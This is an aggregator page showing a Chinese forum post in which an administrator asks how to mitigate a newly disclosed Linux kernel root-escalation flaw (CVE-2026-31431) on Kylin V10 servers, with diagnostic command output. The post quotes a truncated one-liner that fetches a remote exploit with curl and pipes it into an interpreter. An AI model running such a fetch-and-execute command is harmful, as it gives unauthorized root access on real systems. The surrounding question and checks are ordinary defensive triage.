惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

WordPress大学
WordPress大学
小众软件
小众软件
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
博客园 - Franky
Jina AI
Jina AI
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
Y
Y Combinator Blog
V
Visual Studio Blog
C
Check Point Blog
阮一峰的网络日志
阮一峰的网络日志
U
Unit 42
量子位
人人都是产品经理
人人都是产品经理
博客园 - 聂微东
M
MIT News - Artificial intelligence
爱范儿
爱范儿
B
Blog RSS Feed
MyScale Blog
MyScale Blog
H
Help Net Security
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
美团技术团队
L
LangChain Blog
D
Docker

LINUX DO - 最新话题

谷歌云盘下载700g数据集,求方法 OpenAI推出了100美元的Pro订阅后,plus的Codex 5小时限额大幅缩水 之前买的super grok居然还没掉 关于CPA认证文件周限 佬们,默认CDK的要求是什么等级啊? 最新版本的微信群聊机器人方案 有没有人知道如何free号没有封,那么是否可以循环使用,因为我看主要是周限 L站改版了?吓我一跳,我以为我浏览器崩了 淘宝这种宽带可信吗,500兆移动宽带月费8元到2099年 docker内部应用访问宿主机mysql和redis时被拒绝connection refuse Erp全栈想转行做Ai有什么推荐的吗 boost有bug 佬们,有没有靠谱点的 Plus 购买渠道 大妈,狗妈用的 lg 服务有源头开源项目吗? 有人有能过验证码打码的嘛 上次帖里好像发过通过大模型来打码的 gpt plus 封号似乎也太快了点,一天就给封号了 按流量/token收费的国产官方AI推荐 我算是知道了为什么Oracle总是ABC了 佬友们帮我分析一下 ChatGPT Team账号只有一个人使用和4个席位邀请满了使用的总额度是一样的吗? gpt-free 10个带rt CPA反代claude是默认1m吗? 我终于敢说我做出来windows上tmux的替代了,目标windows/全平台最强的终端Ai编程工具 claude pro升级max,除了原来的$20,好像还能再领一次$100 关于AI agent的知识框架 独乐乐不如众乐乐,分享一下我的的AI对话程序 佬们自建网站支付问题是怎么解决的 怎么能让gpt模仿claude风格输出 codex free已经死了,下一个会是plus或者team吗 请问chatgpt pro里的fast模式,速度快了,降智吗
国产麒麟OS如何处理今天通报的Linux内核漏洞?
yamika · 2026-04-30 · via LINUX DO - 最新话题
今天收到部门通告,说有新发现的Linux内核漏洞,正好也看到了佬友发的帖子: Linux 系统重大提权漏洞 2017年后所有系统均受影响 一行命令任意用户直接拿root 多数发行版仍未修复 前沿快讯 [image] 今天刚刚公布了一个 CVE-2026-31431 普通用户直接一行命令直接提权至root 这次POC发的非常早 导致绝大多数日用系统都还没有修复 包括 ubuntu 24 lts, debian 12 13 等 个人测试已经在多个大型项目的系统中复现 以下为非root执行后 直接拥有root权限 ~$ curl https://copy.fail/exp | p… 看了一下后发现目前通报的受影响的发行版: Ubuntu 24.04 LTS Amazon Linux 2023 Red Hat Enterprise Linux 10 Red Hat Enterprise Linux 9 Red Hat Enterprise Linux 8 SUSE 16 没有提及国产OS,目前部门内有用到Kylin V10的服务器,麒麟官网目前没有发布相关漏洞信息,按照腾讯云发布的排查方法排查了下,发现内核(4.19.90)可能是受影响版本,系统启用了模块加载但没有加载受影响模块。 腾讯云通告链接: https://cloud.tencent.com/announce/detail/2277 排查方法: (点击了解更多详细信息) 排查结果: [~]# uname -r 4.19.90-89.11.v2401.ky10.x86_64 [~]# grep CONFIG_CRYPTO_USER_API_AEAD /boot/config-$(uname -r) CONFIG_CRYPTO_USER_API_AEAD=m [~]# lsmod | grep algif [~]# python3 -c "import socket; socket.socket(38,5,0); print('VULNERABLE')" VULNERABLE 请问各位佬友,目前应该如何处理呢,像通告里的禁用内核模块的缓解措施可以吗? 5 个帖子 - 3 位参与者 阅读完整话题